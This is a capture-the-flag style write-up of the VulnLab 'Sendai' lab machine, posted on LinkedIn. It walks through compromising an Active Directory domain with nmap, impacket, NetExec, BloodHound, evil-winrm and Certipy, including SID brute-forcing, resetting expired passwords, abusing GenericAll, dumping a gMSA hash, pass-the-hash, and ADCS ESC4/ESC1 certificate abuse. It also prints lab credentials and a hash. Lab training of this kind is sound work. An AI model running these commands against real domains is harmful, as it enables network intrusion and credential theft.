Penetration Testing - Sendai - Vulnlab

Penetration Testing - Sendai - Vulnlab

Enrique A. Enrique A.

Enrique A.

CRTP | PNPT | ARTA | Security Engineer with 9 + years of experience in network penetration testing, AD testing, Linux Server Testing and web application security testing.

发布日期: 2024年6月17日
+ 关注

Intro

The Sendai machine from VulnLab presents a complex and multifaceted challenge for penetration testers. This writeup explores the step-by-step process of enumerating services, exploiting vulnerabilities, and achieving privilege escalation on Sendai. Starting with a comprehensive Nmap scan, we identified multiple services including Microsoft IIS, Kerberos, and LDAP, which provided various entry points. Through meticulous SMB enumeration, we discovered and exfiltrated sensitive files, revealing user accounts and security weaknesses. By leveraging these findings, we exploited user credentials and abused Active Directory configurations to ultimately gain administrative access, showcasing a complete exploitation path from initial access to full system compromise.

Nmap Results 

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 12:04 EEST
Nmap scan report for dc.sendai.vl (10.10.112.115)
Host is up (0.045s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-17 09:04:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after:  2024-07-18T00:00:00
|_http-title: IIS Windows Server
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-17T09:05:38+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-06-16T08:48:11
|_Not valid after:  2024-12-16T08:48:11
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-17T09:05:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.30 seconds


Web Server

The web server is enabled but it shows a default install.



SMB Enumeration

Found the following shares:

It is not possible to get the contents of the config folder.

It is possible to log into the "sendai" folder as a guest:

Once inside the sendai folder. Checked the transfer folder and found folders for the following users:

I will create a new file named "users.txt" with all the users I can collect from this server: 

anthony.smith
clifford.davey
elliot.yates
susan.harper
thomas.powell

Also, checking the rest of the folders, found the following files that are now exfiltrated to my machine:

guidelines.txt

This file seems to be a compliance file providing the compliance guidelines for this company.

incident.txt 

Dear valued employees,

We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.

To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.

We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.

If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.

Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.

According to it, users with insecure passwords are now required to change them. So there's a big possibility that some users have not changed their passwords yet.


Resetting user passwords

We now have a small list of users that were obtained from the smb share. We can get more users by checking with with the impacket tool "impacket-lookupsid" that will basically bruteforce SIDs to get the user data. 


└─$ impacket-lookupsid [email protected] 10000             
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at dc.sendai.vl
[*] StringBinding ncacn_np:dc.sendai.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132
498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SENDAI\Administrator (SidTypeUser)
501: SENDAI\Guest (SidTypeUser)
502: SENDAI\krbtgt (SidTypeUser)
512: SENDAI\Domain Admins (SidTypeGroup)
513: SENDAI\Domain Users (SidTypeGroup)
514: SENDAI\Domain Guests (SidTypeGroup)
515: SENDAI\Domain Computers (SidTypeGroup)
516: SENDAI\Domain Controllers (SidTypeGroup)
517: SENDAI\Cert Publishers (SidTypeAlias)
518: SENDAI\Schema Admins (SidTypeGroup)
519: SENDAI\Enterprise Admins (SidTypeGroup)
520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
525: SENDAI\Protected Users (SidTypeGroup)
526: SENDAI\Key Admins (SidTypeGroup)
527: SENDAI\Enterprise Key Admins (SidTypeGroup)
553: SENDAI\RAS and IAS Servers (SidTypeAlias)
571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
1000: SENDAI\DC$ (SidTypeUser)
1101: SENDAI\DnsAdmins (SidTypeAlias)
1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
1104: SENDAI\sqlsvc (SidTypeUser)
1105: SENDAI\websvc (SidTypeUser)
1107: SENDAI\staff (SidTypeGroup)
1108: SENDAI\Dorothy.Jones (SidTypeUser)
1109: SENDAI\Kerry.Robinson (SidTypeUser)
1110: SENDAI\Naomi.Gardner (SidTypeUser)
1111: SENDAI\Anthony.Smith (SidTypeUser)
1112: SENDAI\Susan.Harper (SidTypeUser)
1113: SENDAI\Stephen.Simpson (SidTypeUser)
1114: SENDAI\Marie.Gallagher (SidTypeUser)
1115: SENDAI\Kathleen.Kelly (SidTypeUser)
1116: SENDAI\Norman.Baxter (SidTypeUser)
1117: SENDAI\Jason.Brady (SidTypeUser)
1118: SENDAI\Elliot.Yates (SidTypeUser)
1119: SENDAI\Malcolm.Smith (SidTypeUser)
1120: SENDAI\Lisa.Williams (SidTypeUser)
1121: SENDAI\Ross.Sullivan (SidTypeUser)
1122: SENDAI\Clifford.Davey (SidTypeUser)
1123: SENDAI\Declan.Jenkins (SidTypeUser)
1124: SENDAI\Lawrence.Grant (SidTypeUser)
1125: SENDAI\Leslie.Johnson (SidTypeUser)
1126: SENDAI\Megan.Edwards (SidTypeUser)
1127: SENDAI\Thomas.Powell (SidTypeUser)
1128: SENDAI\ca-operators (SidTypeGroup)
1129: SENDAI\admsvc (SidTypeGroup)
1130: SENDAI\mgtsvc$ (SidTypeUser)
1131: SENDAI\support (SidTypeGroup)

Let's add all those users to our user.txt file.

With those users on our file, we can now check which users need to reset their passwords. To do that we can user "CrackMapExec" or "NXC"

After filtering the results, we can reset the password for the following users: 

└─$ cat crackmapexec.txt| grep "PASSWORD_MUST_CHANGE"
SMB         10.10.112.115   445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.112.115   445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE

Let's change it for both . I will use impacket-smbpasswd.


impacket-smbpasswd sendai.vl/[email protected] -newpass 'Password123!!!'


Checking if the password works:

./nxc smb 10.10.112.115 -u users2.txt -p 'Password123!!!' -d sendai.vl --continue-on-success


At this point, I tried logging to RDP but it was failing for both users.

Let's get more information about the environment with BloodHound.


BloodHound - Getting more information from AD and Finding an Attack Path.

If you do not have BloodHound installed, you can follow the guide here: https://github.com/SpecterOps/BloodHound

There is a way to extract the data remotely with BloodHound.py

python3


Once the data is ingested into bloodhound. I am checking the user thomas.powell (same with elliot.yates). The next graphic is showing us that basically Thomas Powell is part of the Support Group and this group has "GenericAll" permissions on ADMSVC group.

领英推荐


Also, ADMSVC group has the following members:

Also, ADMSVC group has ReadGMSAPassword for user MGTSVC$

We now have an attack path. Let's add Thomas to the ADMSVC group:


python3


The user is now part fot eh ADMSVC group. We can now dump the hash for user MGTSVC:

./nxc ldap 10.10.112.115 -u thomas.powell -p 'Password123!!!' --gmsa

Let's confirm it works:

./nxc smb 10.10.112.115 -u mgtsvc -H 57ae3a74ca9345ae52fadc29f178ad11


Logging to the machine

We will use Evil-Winrm

evil-winrm -i 10.10.112.115 -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

Once logged in. Since I found the SeMachineAccountPrivilege, I attempted to run KrbRelayUp but had no success.

Ran PrivEscCheck.ps1

It shows the cleartext password for user clifford.davey | RFmoB2WplgE_3p

Tried to log into the machine with this user but it was not working:

Abusing ADCS ESC4 vulnerability

Since it was not possible to log into the machine with the user. The following was found in Bloodhound:

He is member of CA-Operators (Certificate Authority Operators). So this means that probably this group has access for certificate enrollment.

Checking for vulnerabilities:

./certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.112.115 -stdout


This outlines a template called SendaiComputer, configured for client authentication, allowing system access. The ca-operators group has full control over this template, meaning it can be edited. This capability allows us to impersonate a domain admin, a practice known as ESC4.

Let's abuse it. The following command will be converting this ESC4 to ESC1. This vulnerability allows low privileged users to enroll and request a certificate on behalf of any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account such as a domain administrator.

Let's do that:

./certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.83.157 -template SendaiComputer


This template is now ESC1 which means we can now request a certificate:

/certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.83.157 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator


Now that we have the certificate, we can use it to extract the NTLM hash:

./certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sendai.vl' -dc-ip 10.10.83.157

Privilege Escalation

Now that we have the NTLM hash for the administrator, we can log into the machine with Evil-WinRm:

Now it is possible to get the flags.

C:\user.txt

C:\users\administrator\Desktop\flag.txt


Conclusions

Sendai machine from VulnLab offered a rich learning experience, highlighting the importance of thorough enumeration and strategic exploitation. The journey from initial Nmap scan to full system compromise demonstrated several key points:

  1. Enumeration is Crucial: The detailed Nmap scan provided valuable information about the services and potential vulnerabilities on the target machine. This foundational step set the stage for all subsequent actions.
  2. SMB Enumeration and User Discovery: By carefully examining SMB shares, we were able to uncover sensitive information and user accounts. This step was pivotal in progressing through the exploitation phase.
  3. Credential Exploitation: Utilizing discovered user credentials allowed us to gain a foothold within the network. The ability to escalate privileges through password resets and leveraging AD group memberships was instrumental in advancing our access level.
  4. Active Directory Misconfigurations: The abuse of Active Directory misconfigurations, such as exploiting group memberships and certificate services, underscored the significance of proper AD security practices. These misconfigurations provided direct pathways to elevate privileges and gain administrative control.
  5. Persistence and Privilege Escalation: Privilege escalation techniques, including the use of tools like BloodHound and Impacket, were crucial in maintaining access and moving laterally within the network.

In conclusion, the Sendai machine serves as an excellent real life case study in demonstrating a holistic approach to penetration testing or red teaming. It reinforces the value of methodical enumeration, creative exploitation, and strategic use of tools to uncover and exploit system weaknesses. Through this exercise, we have highlighted both the importance of robust security practices and the effectiveness of offensive security methodologies in identifying vulnerabilities.


要查看或添加评论,请登录

Enrique A.的更多文章

社区洞察

其他会员也浏览了